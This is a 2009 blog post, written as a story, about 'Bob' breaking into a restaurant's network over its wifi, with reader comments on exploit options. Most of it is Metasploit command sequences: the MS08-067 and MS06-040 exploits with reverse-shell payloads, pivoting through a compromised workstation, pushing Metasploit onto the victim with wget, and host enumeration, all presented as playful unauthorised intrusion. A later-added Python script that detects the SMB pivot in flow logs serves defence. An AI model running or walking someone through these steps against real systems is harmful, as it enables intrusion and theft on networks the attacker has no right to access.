Saturday, October 31, 2009

Bob's Double Penetration Adventure - Part 2

So Bob decides to revisit his newfound playground at Walliford Fries and get to grips with his new tools. He connects up to the wifi with the password he's already cracked and this time, rather than using the Autopwn feature, he decides to try something else. Bob's idea is to use the PC he exploited previously as a point from which to launch other attacks deeper into the network.

Bob launches his trusty MS08-067 exploit, this time with a meterpreter/reverse_tcp payload.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set RHOST 192.168.1.102
set ExitOnSession False
exploit -j -z

Excellent, Bob gets his session. He connects to the session and checks the network settings on his compromised host.

sessions -i 1
execute -H -f cmd.exe -i
ipconfig

While he is on the remote host, Bob checks a few things; ideally he could do with knowing about the network servers. At this point he just wants the basics: name and IP.

net view

And he could do with the IP addresses too. He'll want these for his scans.

ping -n 1 server01
ping -n 1 server02

That'll do for now. Bob comes out of the shell, backgrounds his meterpreter session and creates a route pointing to the internal LAN through his session.

exit
background
route add 10.0.1.0 255.255.255.0 1
route print

Now time to see if the magic works. Bob selects the auxiliary scanner and checks the OS versions of the two servers on the internal LAN by pivoting through his compromised host.

use auxiliary/scanner/smb/version
set RHOSTS 10.0.1.230
run
set RHOSTS 10.0.1.231
run

Hmmm, interesting. Windows 2003 with no service pack. Bob wonders if he can exploit that through the pivot.

use windows/smb/ms08_067_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

Bugger! No such luck. Hang on though, Bob remembers something he read once. He can use Mubix's handy-dandy deploymsf script to install Metasploit on his compromised host. Perfect!

He grabs files he needs from the web, putting them into his plugin directory.

cd /pentest/exploits/framework3/plugins/
wget http://metasploit.com/releases/framework-3.3-dev.exe
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

And then it's just a case of connecting back to his session on the pwned box, running the script and pointing it at the Metasploit executable.

sessions -i 1
run deploymsf.rb -f ../../../pentest/exploits/framework3/plugins/framework-3.3-dev.exe

Holy crap, Batman! Look at that. Bob has installed Metasploit on the host he compromised, thanks to a weak password on the wireless LAN and a missing patch or two.

Now the output isn't always pretty, but it gets the job done.

So what's next? Well, there is that server with no service pack to take care of. For that Bob will try his old faithful ms06_040 exploit.

use windows/smb/ms06_040_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

Perfect, another box to play with. Now Bob wants to dig in deep so he can play on this network for as long as possible, so he's going to need to start pulling together some serious information. He could get this all manually, but of course that's pretty dumb, especially when he can use Dark Operator's excellent WinEnum script. This will go out and grab nearly everything he wants so he can understand the network better, and stick it all in one big text file so Bob has some bedtime reading. As Bob's already sitting in a meterpreter session, he simply runs the WinEnum script.

run winenum

Sorted. Again it's getting late, so Bob decides to call it a day. Before he does though, he needs to leave himself a few backdoors... which will of course be in the next post.
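
As an added example (not part of the original post), here is the same chain seen from the defender's side. Because of the route Bob added, every scan and exploit attempt against the 10.0.1.0/24 servers actually leaves the compromised workstation on the wireless segment (192.168.1.102) and lands on tcp/445, so a flow log will show one wireless client talking SMB to several servers in quick succession. The script below, with constructed sample flow records, flags any 192.168.1.0/24 host that opens SMB to two or more 10.0.1.0/24 servers within a five-minute window.

```python
"""Flag the pivot pattern from the walkthrough in flow logs: a wireless-segment
host (192.168.1.0/24) opening SMB (tcp/445) to several server-segment hosts
(10.0.1.0/24) inside a short window, which is what the smb/version scan and
the ms08_067 / ms06_040 attempts look like on the wire."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

WIRELESS = ipaddress.ip_network("192.168.1.0/24")   # client/wifi segment from the post
SERVERS = ipaddress.ip_network("10.0.1.0/24")       # internal LAN Bob routed into

# Constructed flow records (timestamp, src, dst, dport); assumed log format, not real data.
SAMPLE_FLOWS = """\
2009-10-31T21:02:11 192.168.1.102 10.0.1.230 445
2009-10-31T21:02:13 192.168.1.102 10.0.1.231 445
2009-10-31T21:02:40 192.168.1.102 10.0.1.231 445
2009-10-31T21:05:00 192.168.1.50 10.0.1.230 80
2009-10-31T21:30:00 192.168.1.102 10.0.1.230 445
"""


def parse_flows(text):
    """Turn whitespace-separated flow lines into (datetime, src, dst, dport) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        rows.append((datetime.fromisoformat(ts), ipaddress.ip_address(src),
                     ipaddress.ip_address(dst), int(dport)))
    return rows


def find_smb_pivots(flows, window=timedelta(minutes=5), min_targets=2):
    """Return {src: sorted list of dsts} for wireless hosts that reach SMB on at
    least min_targets distinct server-segment hosts within one sliding window."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == 445 and src in WIRELESS and dst in SERVERS:
            by_src[src].append((ts, dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            targets = {d for t, d in events[i:] if t - start <= window}
            if len(targets) >= min_targets:
                hits[str(src)] = sorted(str(d) for d in targets)
                break
    return hits


if __name__ == "__main__":
    print(find_smb_pivots(parse_flows(SAMPLE_FLOWS)))
```

A client-to-server SMB fan-out like this is also a natural place for a firewall rule: workstations on the wifi segment rarely need tcp/445 to servers they do not map drives from.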

7 comments:

CG said...

If Bob had RTFM and set the appropriate target and changed the LPORT, that 08-067 exploit probably would have worked :-)

SynJunkie said...

You're right, Chris, Bob is such a noob. I bet his excuse would be pretty lame, like he was looking for a way to get the deploymsf.rb script in the blog post. We know the truth though, he clearly doesn't know what he's doing.

CG said...

As long as Bob gets his shell, I guess that's all that matters :-)

SynJunkie said...

Nah, in the words of Carlos "Shell is just the beginning!". Bob wants the good stuff.

crazytrain1978 said...

Great Post, I always learn such a lot from these :) As a noob myself, could you or CG explain more clearly what the issue was with the ms08_067 example and what the appropriate host and lport should have been? Sorry if this is obvious to everyone else reading :)

Cheers,
crazytrain1978

SynJunkie said...

Sure. There are a number of additional options that could have been set, such as Target, LHOST, RHOST, LPORT, RPORT, SMBPIPE and plenty more (show options and show advanced). In some circumstances these are required and in some they are not. For example, I just successfully popped a box specifying only the exploit (MS08-067), the payload (meterpreter/bind_tcp) and the RHOST (the remote target). I think that CG was letting me know that in some circumstances I may need to specify additional options.

One point though. Those options I just specified worked from a physical host to a virtual target. The same options would not work from virtual host to a virtual target. In fact the only way I could pop the virtual target from a virtual host was to use the db_autopwn feature.

Does that help?

crazytrain1978 said...

Yip sure does, thanks for taking the time to explain :) much appreciated and keep 'em coming :)

Cheers,
crazytrain1978